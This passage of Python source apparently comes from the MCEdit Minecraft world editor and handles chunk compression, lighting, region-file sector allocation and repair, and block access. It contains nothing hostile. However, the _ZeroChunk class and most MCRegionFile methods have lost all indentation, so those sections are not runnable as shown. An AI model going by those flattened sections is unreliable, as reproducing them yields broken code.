                break
        if proc.returncode is None:
            try:
                proc.kill()
            except WindowsError:
                pass #access denied, process already terminated
            proc.wait()
        shutil.rmtree(tempdir)
        if ";)" in version: version = version.replace(";)", "") #Damnit, Jeb!
        # Versions like "0.2.1" are alphas, and versions like "1.0.0" without "Beta" are releases
        if version[0] == "0":
            version = "Alpha " + version
        try:
            if int(version[0]) > 0:
                version = "Release " + version
        except ValueError:
            pass
        return version
# Cache of placebo chunks, keyed by world height.
_zeros = {}
def ZeroChunk(height=512):
    """Return a memoized all-air placebo chunk of the given height."""
    if height not in _zeros:
        _zeros[height] = _ZeroChunk(height)
    return _zeros[height]
class _ZeroChunk(object):
" a placebo for neighboring-chunk routines "
def compress(self): pass
def load(self): pass
def __init__(self, height=512):
zeroChunk = zeros((16, 16, height), uint8)
whiteLight = zeroChunk + 15;
self.Blocks = zeroChunk
self.BlockLight = whiteLight
self.SkyLight = whiteLight
self.Data = zeroChunk
class InfdevChunk(EntityLevel):
    """ This is a 16x16xH chunk in an (infinite) world.
    The properties Blocks, Data, SkyLight, BlockLight, and Heightmap
    are ndarrays containing the respective blocks in the chunk file.
    Each array is indexed [x,z,y]. The Data, Skylight, and BlockLight
    arrays are automatically unpacked from nibble arrays into byte arrays
    for better handling.
    """
    @property
    def filename(self):
        # Region worlds: a human-readable description of where the chunk sits
        # inside its region file. Chunk-format worlds: the per-chunk file path.
        if self.world.version:
            cx, cz = self.chunkPosition
            rx, rz = cx >> 5, cz >> 5
            rf = self.world.regionFiles[rx, rz]
            offset = rf.getOffset(cx & 0x1f, cz & 0x1f)
            return u"{region} index {index} sector {sector} length {length} format {format}".format(
                region=os.path.basename(self.world.regionFilename(rx, rz)),
                sector=offset >> 8,
                length = offset & 0xff,
                index=4 * ((cx & 0x1f) + ((cz & 0x1f) * 32)),
                format=["???", "gzip", "deflate"][self.compressMode])
        else:
            return self.chunkFilename
    # Class-level defaults, shadowed by instance attributes once set.
    dirty = False;
    needsLighting = False
    compressedTag = None
    root_tag = None
    def __init__(self, world, chunkPosition, create=False):
        """Bind the chunk to *world* at *chunkPosition*; create an empty chunk
        on disk when *create*, else require it to already exist."""
        self.world = world;
        self.chunkPosition = chunkPosition;
        self.chunkFilename = world.chunkFilename(*chunkPosition)
        # Region worlds use zlib (deflate); old per-file chunks use gzip.
        if self.world.version:
            self.compressMode = MCRegionFile.VERSION_DEFLATE
        else:
            self.compressMode = MCRegionFile.VERSION_GZIP
        if create:
            self.create();
        else:
            if not world.containsChunk(*chunkPosition):
                raise ChunkNotPresent("Chunk {0} not found", self.chunkPosition)
    @property
    def materials(self):
        return self.world.materials
    @classmethod
    def compressTagGzip(cls, root_tag):
        """Serialize *root_tag* to gzip-compressed NBT bytes."""
        buf = StringIO()
        with closing(gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=2)) as gzipper:
            root_tag.save(buf=gzipper)
        return buf.getvalue()
    @classmethod
    def compressTagDeflate(cls, root_tag):
        """Serialize *root_tag* to zlib(deflate)-compressed NBT bytes."""
        buf = StringIO()
        root_tag.save(buf=buf)
        return deflate(buf.getvalue())
    def _compressChunk(self):
        # Turn root_tag into compressedTag and drop the tag tree.
        root_tag = self.root_tag
        if root_tag is None: return
        if self.compressMode == MCRegionFile.VERSION_GZIP:
            self.compressedTag = self.compressTagGzip(root_tag)
        if self.compressMode == MCRegionFile.VERSION_DEFLATE:
            self.compressedTag = self.compressTagDeflate(root_tag)
        self.root_tag = None
    def decompressTagGzip(self, data):
        return nbt.load(buf=gunzip(data))
    def decompressTagDeflate(self, data):
        return nbt.load(buf=inflate(data))
    def _decompressChunk(self):
        # Turn compressedTag back into a root_tag tree.
        data = self.compressedTag
        if self.compressMode == MCRegionFile.VERSION_GZIP:
            self.root_tag = self.decompressTagGzip(data)
        if self.compressMode == MCRegionFile.VERSION_DEFLATE:
            self.root_tag = self.decompressTagDeflate(data)
    def compressedSize(self):
        "return the size of the compressed data for this level, in bytes."
        self.compress();
        if self.compressedTag is None: return 0
        return len(self.compressedTag)
    def sanitizeBlocks(self):
        #change grass to dirt where needed so Minecraft doesn't flip out and die
        grass = self.Blocks == self.materials.Grass.ID
        grass |= self.Blocks == self.materials.Dirt.ID
        badgrass = grass[:, :, 1:] & grass[:, :, :-1]
        self.Blocks[:, :, :-1][badgrass] = self.materials.Dirt.ID
        #remove any thin snow layers immediately above other thin snow layers.
        #minecraft doesn't flip out, but it's almost never intended
        if hasattr(self.materials, "SnowLayer"):
            snowlayer = self.Blocks == self.materials.SnowLayer.ID
            badsnow = snowlayer[:, :, 1:] & snowlayer[:, :, :-1]
            self.Blocks[:, :, 1:][badsnow] = self.materials.Air.ID
    def compress(self):
        """Pack and compress the chunk if dirty; otherwise just drop the
        uncompressed tag tree (the OS disk cache will serve re-reads)."""
        if not self.dirty:
            #if we are not dirty, just throw the
            #uncompressed tag structure away. rely on the OS disk cache.
            self.root_tag = None
        else:
            if self.root_tag is not None:
                self.sanitizeBlocks() #xxx
            self.packChunkData()
            self._compressChunk()
        self.world.chunkDidCompress(self);
    def decompress(self):
        """called when accessing attributes decorated with @decompress_first"""
        if not self in self.world.decompressedChunkQueue:
            if self.root_tag != None: return
            if self.compressedTag is None:
                if self.root_tag is None:
                    # Nothing in memory at all; pull the chunk from disk.
                    self.load();
                else:
                    return;
            try:
                self._decompressChunk()
            except Exception, e:
                error(u"Malformed NBT data in file: {0} ({1})".format(self.filename, e))
                if self.world: self.world.malformedChunk(*self.chunkPosition);
                raise ChunkMalformed, (e,), sys.exc_info()[2]
            try:
                self.shapeChunkData()
            except KeyError, e:
                error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
                if self.world: self.world.malformedChunk(*self.chunkPosition);
                raise ChunkMalformed, (e,), sys.exc_info()[2]
            self.dataIsPacked = True;
        self.world.chunkDidDecompress(self);
    def __str__(self):
        return u"InfdevChunk, coords:{0}, world: {1}, D:{2}, L:{3}".format(self.chunkPosition, self.world.displayName, self.dirty, self.needsLighting)
    def create(self):
        """Build a fresh, empty chunk tag tree (air blocks, full skylight),
        mark it dirty, and save it."""
        (cx, cz) = self.chunkPosition;
        chunkTag = nbt.TAG_Compound()
        chunkTag.name = ""
        levelTag = nbt.TAG_Compound()
        chunkTag[Level] = levelTag
        levelTag[TerrainPopulated] = TAG_Byte(1)
        levelTag[xPos] = TAG_Int(cx)
        levelTag[zPos] = TAG_Int(cz)
        levelTag[LastUpdate] = TAG_Long(0);
        # Light and Data arrays hold two 4-bit values per byte, hence "/ 2".
        levelTag[BlockLight] = TAG_Byte_Array()
        levelTag[BlockLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
        levelTag[Blocks] = TAG_Byte_Array()
        levelTag[Blocks].value = zeros(16 * 16 * self.world.Height, uint8)
        levelTag[Data] = TAG_Byte_Array()
        levelTag[Data].value = zeros(16 * 16 * self.world.Height / 2, uint8)
        levelTag[SkyLight] = TAG_Byte_Array()
        levelTag[SkyLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
        levelTag[SkyLight].value[:] = 255
        if self.world.Height <= 256:
            levelTag[HeightMap] = TAG_Byte_Array()
            levelTag[HeightMap].value = zeros(16 * 16, uint8)
        else:
            levelTag[HeightMap] = TAG_Int_Array()
            levelTag[HeightMap].value = zeros(16 * 16, uint32).newbyteorder()
        levelTag[Entities] = TAG_List()
        levelTag[TileEntities] = TAG_List()
        #levelTag["Creator"] = TAG_String("MCEdit-" + release.release);
        #empty lists are seen in the wild with a list.TAG_type for a list of single bytes,
        #even though these contain TAG_Compounds
        self.root_tag = chunkTag
        self.shapeChunkData();
        self.dataIsPacked = True;
        self.dirty = True;
        self.save();
    def save(self):
        """ does not recalculate any data or light """
        self.compress()
        if self.dirty:
            debug(u"Saving chunk: {0}".format(self))
            self.world._saveChunk(self)
            debug(u"Saved chunk {0}".format(self))
            self.dirty = False;
    def load(self):
        """ If the chunk is unloaded, calls world._loadChunk to set root_tag and
        compressedTag, then unpacks the chunk fully"""
        if self.root_tag is None and self.compressedTag is None:
            try:
                self.world._loadChunk(self)
                self.dataIsPacked = True;
                self.shapeChunkData()
                self.unpackChunkData()
            except Exception, e:
                error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
                if self.world: self.world.malformedChunk(*self.chunkPosition);
                raise ChunkMalformed, (e,), sys.exc_info()[2]
            self.world.chunkDidLoad(self)
            self.world.chunkDidDecompress(self);
    def unload(self):
        """ Frees the chunk's memory. Will not save to disk. Unloads completely
        if the chunk does not need to be saved."""
        self.compress();
        if not self.dirty:
            self.compressedTag = None;
            self.world.chunkDidUnload(self)
    def isLoaded(self):
        #we're loaded if we have our tag data in ram
        #and we don't have to go back to the disk for it.
        return not (self.compressedTag is None and self.root_tag is None)
    def isCompressed(self):
        return self.isLoaded() and self.root_tag == None
    def generateHeightMap(self):
        # NOTE(review): delegates entirely to extractLightMap (mclevelbase);
        # presumably fills HeightMap from Blocks — confirm there.
        extractLightMap(self.materials, self.Blocks, self.HeightMap)
    def chunkChanged(self, calcLighting=True):
        """ You are required to call this function after you are done modifying
        the chunk. Pass False for calcLighting if you know your changes will
        not change any lights."""
        if not self.isLoaded(): return;
        self.dirty = True;
        self.needsLighting = calcLighting or self.needsLighting;
        self.generateHeightMap();
        if calcLighting:
            self.genFastLights()
    def genFastLights(self):
        """Cheap skylight pass: full light above the heightmap, then attenuate
        downward through each column by the blocks' light absorption."""
        self.SkyLight[:] = 0;
        if self.world.dimNo in (-1, 1):
            return #no light in nether or the end
        blocks = self.Blocks;
        la = self.world.materials.lightAbsorption
        skylight = self.SkyLight;
        heightmap = self.HeightMap;
        for x, z in itertools.product(xrange(16), xrange(16)):
            skylight[x, z, heightmap[z, x]:] = 15
            lv = 15;
            for y in reversed(range(heightmap[z, x])):
                lv -= (la[blocks[x, z, y]] or 1)
                if lv <= 0:
                    break;
                skylight[x, z, y] = lv;
    def unpackChunkData(self):
        if not self.dataIsPacked: return
        """ for internal use. call getChunk and compressChunk to load, compress, and unpack chunks automatically """
        # Each packed byte holds two 4-bit values: low nibble at even y,
        # high nibble at odd y.  Expand to one byte per value.
        for key in (SkyLight, BlockLight, Data):
            dataArray = self.root_tag[Level][key].value
            s = dataArray.shape
            assert s[2] == self.world.Height / 2;
            #unpackedData = insert(dataArray[...,newaxis], 0, 0, 3)
            unpackedData = zeros((s[0], s[1], s[2] * 2), dtype='uint8')
            unpackedData[:, :, ::2] = dataArray
            unpackedData[:, :, ::2] &= 0xf
            unpackedData[:, :, 1::2] = dataArray
            unpackedData[:, :, 1::2] >>= 4
            self.root_tag[Level][key].value = unpackedData
            self.dataIsPacked = False;
    def packChunkData(self):
        if self.dataIsPacked: return
        if self.root_tag is None:
            warn(u"packChunkData called on unloaded chunk: {0}".format(self.chunkPosition))
            return;
        # Inverse of unpackChunkData: fold pairs of bytes back into nibbles.
        for key in (SkyLight, BlockLight, Data):
            dataArray = self.root_tag[Level][key].value
            assert dataArray.shape[2] == self.world.Height;
            unpackedData = self.root_tag[Level][key].value.reshape(16, 16, self.world.Height / 2, 2)
            unpackedData[..., 1] <<= 4
            unpackedData[..., 1] |= unpackedData[..., 0]
            self.root_tag[Level][key].value = array(unpackedData[:, :, :, 1])
            self.dataIsPacked = True;
    def shapeChunkData(self):
        """Applies the chunk shape to all of the data arrays
        in the chunk tag. used by chunk creation and loading"""
        chunkTag = self.root_tag
        chunkSize = 16
        if not hasattr(self.world, 'HeightOverride'):
            # Infer world height from the first chunk seen and pin it.
            length = chunkTag[Level][Blocks].value.ravel().shape[0]
            height = length / (chunkSize * chunkSize)
            self.world.Height = height
            self.world.HeightOverride = True
            self.world._bounds = None
        chunkTag[Level][Blocks].value.shape = (chunkSize, chunkSize, self.world.Height)
        chunkTag[Level][HeightMap].value.shape = (chunkSize, chunkSize);
        chunkTag[Level][SkyLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
        chunkTag[Level][BlockLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
        chunkTag[Level]["Data"].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
        if TileEntities not in chunkTag[Level]:
            chunkTag[Level][TileEntities] = TAG_List();
        if Entities not in chunkTag[Level]:
            chunkTag[Level][Entities] = TAG_List();
    def addEntity(self, entityTag):
        # Minecraft stores Motion/Position as doubles; coerce before adding.
        def doubleize(name):
            if name in entityTag:
                m = entityTag[name]
                entityTag[name] = TAG_List([TAG_Double(i.value) for i in m])
        doubleize("Motion")
        doubleize("Position")
        self.dirty = True
        return super(InfdevChunk, self).addEntity(entityTag)
    def removeEntitiesInBox(self, box):
        self.dirty = True;
        return super(InfdevChunk, self).removeEntitiesInBox(box)
    def removeTileEntitiesInBox(self, box):
        self.dirty = True;
        return super(InfdevChunk, self).removeTileEntitiesInBox(box)
    @property
    @decompress_first
    def Blocks(self):
        return self.root_tag[Level][Blocks].value
    @property
    @decompress_first
    @unpack_first
    def Data(self):
        return self.root_tag[Level][Data].value
    @property
    @decompress_first
    def HeightMap(self):
        return self.root_tag[Level][HeightMap].value
    @property
    @decompress_first
    @unpack_first
    def SkyLight(self):
        return self.root_tag[Level][SkyLight].value
    @property
    @decompress_first
    @unpack_first
    def BlockLight(self):
        return self.root_tag[Level][BlockLight].value
    @property
    @decompress_first
    def Entities(self):
        return self.root_tag[Level][Entities]
    @property
    @decompress_first
    def TileEntities(self):
        return self.root_tag[Level][TileEntities]
    @property
    @decompress_first
    def TerrainPopulated(self):
        return self.root_tag[Level]["TerrainPopulated"].value;
    @TerrainPopulated.setter
    @decompress_first
    def TerrainPopulated(self, val):
        """True or False. If False, the game will populate the chunk with
        ores and vegetation on next load"""
        self.root_tag[Level]["TerrainPopulated"].value = val;
class dequeset(object):
    """An ordered collection with O(1) membership tests.

    A deque provides ordering and indexing while a parallel set answers
    __contains__ quickly; the two are always updated together.
    """
    def __init__(self):
        self.deque = deque()
        self.set = set()

    def __contains__(self, item):
        return item in self.set

    def __len__(self):
        return len(self.set)

    def append(self, item):
        self.deque.append(item)
        self.set.add(item)

    def discard(self, item):
        # Removing an absent item is a silent no-op, like set.discard.
        if item not in self.set:
            return
        self.deque.remove(item)
        self.set.discard(item)

    def __getitem__(self, idx):
        return self.deque[idx]
class MCRegionFile(object):
    holdFileOpen = False #if False, reopens and recloses the file on each access
    @property
    def file(self):
        """Context manager yielding the region file opened "rb+".

        With holdFileOpen, one handle is kept and wrapped in notclosing so
        "with" blocks don't close it; otherwise a fresh handle per access."""
        openfile = lambda:file(self.path, "rb+")
        if MCRegionFile.holdFileOpen:
            if self._file is None:
                self._file = openfile()
            return notclosing(self._file)
        else:
            return openfile()
    def close(self):
        # Only meaningful when a persistent handle is being held.
        if MCRegionFile.holdFileOpen:
            self._file.close()
            self._file = None
    def __init__(self, path, regionCoords):
        """Open (creating and sector-padding if needed) the region file at
        *path*, read its offset/timestamp tables, build the free-sector map,
        and trigger a repair when the tables are inconsistent."""
        self.path = path
        self.regionCoords = regionCoords
        self._file = None
        if not os.path.exists(path):
            file(path, "w").close()
        with self.file as f:
            filesize = os.path.getsize(path)
            # Pad the file up to a whole number of 4KiB sectors.
            if filesize & 0xfff:
                filesize = (filesize | 0xfff) + 1
                f.truncate(filesize)
            # A brand new file needs the two header sectors (offsets + mtimes).
            if filesize == 0:
                filesize = self.SECTOR_BYTES * 2
                f.truncate(filesize)
            f.seek(0)
            offsetsData = f.read(self.SECTOR_BYTES)
            modTimesData = f.read(self.SECTOR_BYTES)
            self.freeSectors = [True] * (filesize / self.SECTOR_BYTES)
            self.freeSectors[0:2] = False, False
            # Header tables are big-endian 32-bit: offset = sector<<8 | count.
            self.offsets = fromstring(offsetsData, dtype='>u4')
            self.modTimes = fromstring(modTimesData, dtype='>u4')
        needsRepair = False
        for offset in self.offsets:
            sector = offset >> 8
            count = offset & 0xff
            for i in xrange(sector, sector + count):
                if i >= len(self.freeSectors):
                    #raise RegionMalformed, "Region file offset table points to sector {0} (past the end of the file)".format(i)
                    print "Region file offset table points to sector {0} (past the end of the file)".format(i)
                    needsRepair = True
                    break
                if self.freeSectors[i] is False:
                    # Two chunks claim the same sector: table is corrupt.
                    needsRepair = True
                self.freeSectors[i] = False
        if needsRepair:
            self.repair()
        info("Found region file {file} with {used}/{total} sectors used and {chunks} chunks present".format(
             file=os.path.basename(path), used=self.usedSectors, total=self.sectorCount, chunks=self.chunkCount))
@property
def usedSectors(self): return len(self.freeSectors) - sum(self.freeSectors)
@property
def sectorCount(self): return len(self.freeSectors)
@property
def chunkCount(self): return sum(self.offsets > 0)
def repair(self):
lostAndFound = {}
_freeSectors = [True] * len(self.freeSectors)
_freeSectors[0] = _freeSectors[1] = False
deleted = 0
recovered = 0
info("Beginning repairs on {file} ({chunks} chunks)".format(file=os.path.basename(self.path), chunks=sum(self.offsets > 0)))
rx, rz = self.regionCoords
for index, offset in enumerate(self.offsets):
if offset:
cx = index & 0x1f
cz = index >> 5
cx += rx << 5
cz += rz << 5
sectorStart = offset >> 8
sectorCount = offset & 0xff
try:
if sectorStart + sectorCount > len(self.freeSectors):
raise RegionMalformed, "Offset {start}:{end} ({offset}) at index {index} pointed outside of the file".format(
start=sectorStart, end=sectorStart + sectorCount, index=index, offset=offset)
compressedData = self._readChunk(cx, cz)
if compressedData is None:
raise RegionMalformed, "Failed to read chunk data for {0}".format((cx, cz))
format, data = self.decompressSectors(compressedData)
chunkTag = nbt.load(buf=data)
lev = chunkTag["Level"]
xPos = lev["xPos"].value
zPos = lev["zPos"].value
overlaps = False
for i in xrange(sectorStart, sectorStart + sectorCount):
if _freeSectors[i] is False:
overlaps = True
_freeSectors[i] = False
if xPos != cx or zPos != cz or overlaps:
lostAndFound[xPos, zPos] = (format, compressedData)
if (xPos, zPos) != (cx, cz):
raise RegionMalformed, "Chunk {found} was found in the slot reserved for {expected}".format(found=(xPos, zPos), expected=(cx, cz))
else:
raise RegionMalformed, "Chunk {found} (in slot {expected}) has overlapping sectors with another chunk!".format(found=(xPos, zPos), expected=(cx, cz))
except Exception, e:
info("Unexpected chunk data at sector {sector} ({exc})".format(sector=sectorStart, exc=e))
self.setOffset(cx, cz, 0)
deleted += 1
for cPos, (format, foundData) in lostAndFound.iteritems():
cx, cz = cPos
if self.getOffset(cx, cz) == 0:
info("Found chunk {found} and its slot is empty, recovering it".format(found=cPos))
self._saveChunk(cx, cz, foundData[5:], format)
recovered += 1
info("Repair complete. Removed {0} chunks, recovered {1} chunks, net {2}".format(deleted, recovered, recovered - deleted))
def extractAllChunks(self, folder):
if not os.path.exists(folder):
os.mkdir(folder)
for cx, cz in itertools.product(range(32), range(32)):
sectors = self._readChunk(cx, cz)
if sectors is not None:
format, compressedData = self.unpackSectors(sectors)
data = self._decompressSectors(format, compressedData)
chunkTag = nbt.load(buf=data)
lev = chunkTag["Level"]
xPos = lev["xPos"].value
zPos = lev["zPos"].value
gzdata = InfdevChunk.compressTagGzip(chunkTag)
#print chunkTag.pretty_string()
with file(os.path.join(folder, "c.{0}.{1}.dat".format(base36(xPos), base36(zPos))), "wb") as f:
f.write(gzdata)
def _readChunk(self, cx, cz):
cx &= 0x1f
cz &= 0x1f
offset = self.getOffset(cx, cz)
if offset == 0: return None
sectorStart = offset >> 8
numSectors = offset & 0xff
if numSectors == 0: return None
if sectorStart + numSectors > len(self.freeSectors):
return None
with self.file as f:
f.seek(sectorStart * self.SECTOR_BYTES)
data = f.read(numSectors * self.SECTOR_BYTES)
assert(len(data) > 0)
#debug("REGION LOAD {0},{1} sector {2}".format(cx, cz, sectorStart))
return data
def loadChunk(self, chunk):
cx, cz = chunk.chunkPosition
data = self._readChunk(cx, cz)
if data is None: raise ChunkNotPresent, (cx, cz, self)
chunk.compressedTag = data[5:]
format, data = self.decompressSectors(data)
chunk.root_tag = nbt.load(buf=data)
chunk.compressMode = format
def unpackSectors(self, data):
length = struct.unpack_from(">I", data)[0]
format = struct.unpack_from("B", data, 4)[0]
data = data[5:length + 5]
return (format, data)
def _decompressSectors(self, format, data):
if format == self.VERSION_GZIP:
return gunzip(data)
if format == self.VERSION_DEFLATE:
return inflate(data)
raise IOError, "Unknown compress format: {0}".format(format)
def decompressSectors(self, data):
format, data = self.unpackSectors(data)
return format, self._decompressSectors(format, data)
def saveChunk(self, chunk):
cx, cz = chunk.chunkPosition
data = chunk.compressedTag
format = chunk.compressMode
self._saveChunk(cx, cz, data, format)
def _saveChunk(self, cx, cz, data, format):
cx &= 0x1f
cz &= 0x1f
offset = self.getOffset(cx, cz)
sectorNumber = offset >> 8
sectorsAllocated = offset & 0xff
sectorsNeeded = (len(data) + self.CHUNK_HEADER_SIZE) / self.SECTOR_BYTES + 1;
if sectorsNeeded >= 256: return
if (sectorNumber != 0 and sectorsAllocated >= sectorsNeeded):
debug("REGION SAVE {0},{1} rewriting {2}b".format(cx, cz, len(data)))
self.writeSector(sectorNumber, data, format)
else:
# we need to allocate new sectors
# mark the sectors previously used for this chunk as free
for i in xrange(sectorNumber, sectorNumber + sectorsAllocated):
self.freeSectors[i] = True
runLength = 0
try:
runStart = self.freeSectors.index(True)
for i in range(runStart, len(self.freeSectors)):
if runLength:
if self.freeSectors[i]:
runLength += 1
else:
runLength = 0
elif self.freeSectors[i]:
runStart = i
runLength = 1
if runLength >= sectorsNeeded:
break
except ValueError:
pass
# we found a free space large enough
if runLength >= sectorsNeeded:
debug("REGION SAVE {0},{1}, reusing {2}b".format(cx, cz, len(data)))
sectorNumber = runStart
self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
self.writeSector(sectorNumber, data, format)
self.freeSectors[sectorNumber:sectorNumber + sectorsNeeded] = [False] * sectorsNeeded
else:
# no free space large enough found -- we need to grow the
# file
debug("REGION SAVE {0},{1}, growing by {2}b".format(cx, cz, len(data)))
with self.file as f:
f.seek(0, 2)
filesize = f.tell()
sectorNumber = len(self.freeSectors)
assert sectorNumber * self.SECTOR_BYTES == filesize
filesize += sectorsNeeded * self.SECTOR_BYTES
f.truncate(filesize)
self.freeSectors += [False] * sectorsNeeded
self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
self.writeSector(sectorNumber, data, format)
def writeSector(self, sectorNumber, data, format):
with self.file as f:
debug("REGION: Writing sector {0}".format(sectorNumber))
f.seek(sectorNumber * self.SECTOR_BYTES)
f.write(struct.pack(">I", len(data) + 1));# // chunk length
f.write(struct.pack("B", format));# // chunk version number
f.write(data);# // chunk data
#f.flush()
def containsChunk(self, cx,cz):
return self.getOffset(cx,cz) != 0
def getOffset(self, cx, cz):
cx &= 0x1f;
cz &= 0x1f
return self.offsets[cx + cz * 32]
def setOffset(self, cx, cz, offset):
cx &= 0x1f;
cz &= 0x1f
self.offsets[cx + cz * 32] = offset
with self.file as f:
f.seek(0)
f.write(self.offsets.tostring())
SECTOR_BYTES = 4096
SECTOR_INTS = SECTOR_BYTES / 4
CHUNK_HEADER_SIZE = 5;
VERSION_GZIP = 1
VERSION_DEFLATE = 2
compressMode = VERSION_DEFLATE
base36alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
def decbase36(s):
    """Decode a base-36 string (as produced by base36()) into an integer."""
    return int(s, 36)
def base36(n):
    """Return the base-36 string form of an integer, e.g. 35 -> 'z'.

    Negative numbers get a leading '-'; zero encodes as '0'.
    """
    n = int(n)
    if n == 0:
        return '0'

    sign = ""
    if n < 0:
        sign = "-"
        n = -n

    # same digit set as the module-level base36alphabet constant
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
    digits = []
    while n:
        n, rem = divmod(n, 36)
        digits.append(alphabet[rem])

    return sign + ''.join(reversed(digits))
def deflate(data):
    """Compress *data* with zlib at the default level (zlib header included)."""
    return zlib.compress(data)
def inflate(data):
    """Decompress zlib-compressed *data* (inverse of deflate)."""
    return zlib.decompress(data)
class ChunkedLevelMixin(object):
    """Mixin for levels that store blocks in 16x16-column chunks: single-block
    accessors, bulk copy/fill operations, and lighting recalculation. Expects
    the host class to provide getChunk, containsChunk, Height, materials and
    related chunk-management methods."""
    def blockLightAt(self, x, y, z):
        """Return the block light (0-15) at world position x, y, z."""
        if y < 0 or y >= self.Height: return 0
        zc = z >> 4
        xc = x >> 4

        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        ch = self.getChunk(xc, zc)

        return ch.BlockLight[xInChunk, zInChunk, y]

    def setBlockLightAt(self, x, y, z, newLight):
        """Set the block light at x, y, z; marks the chunk changed without
        scheduling a relight."""
        if y < 0 or y >= self.Height: return 0
        zc = z >> 4
        xc = x >> 4
        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        ch = self.getChunk(xc, zc)
        ch.BlockLight[xInChunk, zInChunk, y] = newLight
        ch.chunkChanged(False)

    def blockDataAt(self, x, y, z):
        """Return the block data value at x, y, z, or 0 outside loaded chunks."""
        if y < 0 or y >= self.Height: return 0
        zc = z >> 4
        xc = x >> 4

        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        try:
            ch = self.getChunk(xc, zc)
        except ChunkNotPresent:
            return 0

        return ch.Data[xInChunk, zInChunk, y]

    def setBlockDataAt(self, x, y, z, newdata):
        """Set the block data value at x, y, z; flags the chunk for relighting.
        Returns 0 (and does nothing) outside loaded chunks or the height range."""
        if y < 0 or y >= self.Height: return 0
        zc = z >> 4
        xc = x >> 4

        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        try:
            ch = self.getChunk(xc, zc)
        except ChunkNotPresent:
            return 0

        ch.Data[xInChunk, zInChunk, y] = newdata
        ch.dirty = True
        ch.needsLighting = True

    def blockAt(self, x, y, z):
        """returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
        if y < 0 or y >= self.Height: return 0

        zc = z >> 4
        xc = x >> 4
        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        try:
            ch = self.getChunk(xc, zc)
        except ChunkNotPresent:
            return 0

        return ch.Blocks[xInChunk, zInChunk, y]

    def setBlockAt(self, x, y, z, blockID):
        """returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
        if y < 0 or y >= self.Height: return 0

        zc = z >> 4
        xc = x >> 4
        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        try:
            ch = self.getChunk(xc, zc)
        except ChunkNotPresent:
            return 0

        ch.Blocks[xInChunk, zInChunk, y] = blockID
        ch.dirty = True
        ch.needsLighting = True

    def skylightAt(self, x, y, z):
        """Return the sky light (0-15) at world position x, y, z."""
        if y < 0 or y >= self.Height: return 0
        zc = z >> 4
        xc = x >> 4

        xInChunk = x & 0xf;
        zInChunk = z & 0xf

        ch = self.getChunk(xc, zc)

        return ch.SkyLight[xInChunk, zInChunk, y]

    def setSkylightAt(self, x, y, z, lightValue):
        """Raise the sky light at x, y, z to lightValue (never lowers it).
        Returns True when the stored value was increased."""
        if y < 0 or y >= self.Height: return 0
        zc = z >> 4
        xc = x >> 4

        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        ch = self.getChunk(xc, zc)
        skyLight = ch.SkyLight

        oldValue = skyLight[xInChunk, zInChunk, y]
        ch.chunkChanged(False)

        if oldValue < lightValue:
            skyLight[xInChunk, zInChunk, y] = lightValue
        return oldValue < lightValue

    def sourceMaskFunc(self, blocksToCopy):
        # Build a masking function for copy operations: selects only the
        # listed block IDs, or everything when blocksToCopy is None.
        if blocksToCopy is not None:
            typemask = zeros((256) , dtype='bool')
            typemask[blocksToCopy] = 1;

            def sourceMask(sourceBlocks):
                return typemask[sourceBlocks]
        else:
            def sourceMask(_sourceBlocks):
                # slice(None, None) selects every element when used as a mask
                return slice(None, None)

        return sourceMask

    def copyBlocksFromFiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
        """Copy blocks from a finite (single-array) level into this chunked
        level, one destination chunk at a time. Yields (i, chunkCount)
        progress tuples."""
        #assumes destination point and bounds have already been checked.
        (sx, sy, sz) = sourceBox.origin

        start = datetime.now();

        sourceMask = self.sourceMaskFunc(blocksToCopy)

        destBox = BoundingBox(destinationPoint, sourceBox.size)

        i = 0;
        chunkCount = float(destBox.chunkCount)

        for (cPos, slices, point) in self._getSlices(destBox):
            if not self.containsChunk(*cPos):
                if create:
                    self.createChunk(*cPos)
                else:
                    continue
            chunk = self.getChunk(*cPos)

            i += 1;
            yield (i, chunkCount)
            if i % 100 == 0:
                info("Chunk {0}...".format(i))

            blocks = chunk.Blocks[slices];
            # far corner of the source region covered by this dest chunk
            localSourceCorner2 = (
                sx + point[0] + blocks.shape[0],
                sy + blocks.shape[2],
                sz + point[2] + blocks.shape[1],
            )

            sourceBlocks = sourceLevel.Blocks[sx + point[0]:localSourceCorner2[0],
                                              sz + point[2]:localSourceCorner2[2],
                                              sy:localSourceCorner2[1]]
            #sourceBlocks = filterTable[sourceBlocks]
            mask = sourceMask(sourceBlocks)

            #for small level slices, reduce the destination area
            x, z, y = sourceBlocks.shape
            blocks = blocks[0:x, 0:z, 0:y]

            sourceData = None
            if hasattr(sourceLevel, 'Data'):
                #indev or schematic
                sourceData = sourceLevel.Data[sx + point[0]:localSourceCorner2[0],
                                              sz + point[2]:localSourceCorner2[2],
                                              sy:localSourceCorner2[1]]

            data = chunk.Data[slices][0:x, 0:z, 0:y]

            convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)

            blocks[mask] = convertedSourceBlocks[mask]
            if convertedSourceData is not None:
                data[mask] = (convertedSourceData[:, :, :])[mask]
                data[mask] &= 0xf;

            chunk.chunkChanged();

        d = datetime.now() - start;
        if i:
            info("Finished {2} chunks in {0} ({1} per chunk)".format(d, d / i, i))

        #chunk.compress(); #xxx find out why this trashes changes to tile entities

    def copyBlocksFromInfiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
